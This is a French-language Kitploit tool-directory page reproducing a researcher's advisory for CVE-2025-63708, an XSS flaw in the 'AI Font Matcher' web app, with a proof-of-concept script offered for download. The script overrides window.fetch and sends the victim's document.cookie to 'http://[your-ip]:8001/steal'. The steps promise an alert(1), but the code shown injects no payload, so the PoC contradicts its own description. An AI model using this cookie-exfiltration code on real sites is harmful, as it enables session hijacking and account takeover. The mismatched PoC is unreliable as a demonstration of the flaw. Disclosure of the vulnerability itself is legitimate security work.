Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-63708 | Kitploit
Outils/GitHubGitHub/dylandavis1/cve-2025-63708
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubdylandavis1/cve-2025-63708

CVE-2025-63708

Voir le dépôt
il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-63708

ID CVE : CVE-2025-63708
Assigné : 11-12-2025 Type de problème : CWE-79 (Cross-Site Scripting)
Produit concerné : « AI Font Matcher » (publié le 2025-10-10, nid=18425)
Page produit : https://www.sourcecodester.com/javascript/18425/ai-font-matcher-using-html-css-and-javascript-source-code.html
Date de découverte : 2025-10-11
Chercheur : Dylan Davis

Résumé

L’application traite des données issues d’un fetch webfonts sans assainir les noms de familles de polices. Un attaquant qui contrôle ou intercepte cette réponse peut injecter du JavaScript qui s’exécute dans le contexte de la page, permettant le vol de cookies de session et la prise de contrôle du compte.

Impact

  • Exécution arbitraire de JavaScript dans le navigateur d’une victime
  • Exfiltration de cookies de session (j’ai observé des cookies non-HttpOnly lors de mes tests)
  • Détournement de compte et actions effectuées au nom de l’utilisateur

Versions concernées / Portée

  • Le paquet « AI Font Matcher » distribué sur SourceCodester à la date du 2025-10-10.

Reproduction (PoC)

Ce PoC démontre l’exécution de code en hookant window.fetch et en renvoyant une charge utile Web Fonts contrôlée.

  1. Exécutez l’application localement à partir du code source téléchargé.
  2. Ouvrez DevTools → Console et collez le PoC ci-dessous (ou chargez poc.js).
  3. Déclenchez l’interface utilisateur qui récupère webfonts ; observez un alert(1).
root@kitploit:~
window.__origFetch = window.fetch;
window.fetch = async function(input, init) {
    const url = (typeof input === 'string') ? input : input?.url;
    if (url && url.includes('webfonts')) {
        // Exfiltrate cookie to your server
        fetch('http://[your-ip]:8001/steal?cookie=' + 
              encodeURIComponent(document.cookie))
            .catch(e => console.log('Exfil failed:', e));
        
        return new Response(JSON.stringify({
            kind: "webfonts#webfontList",
            items: [{ family: "Playfair Display", category: "serif" }]
        }), {
            status: 200, 
            headers: {'Content-Type': 'application/json'}
        });
    }
    return window.__origFetch.apply(this, arguments);
};
Télécharger l’outil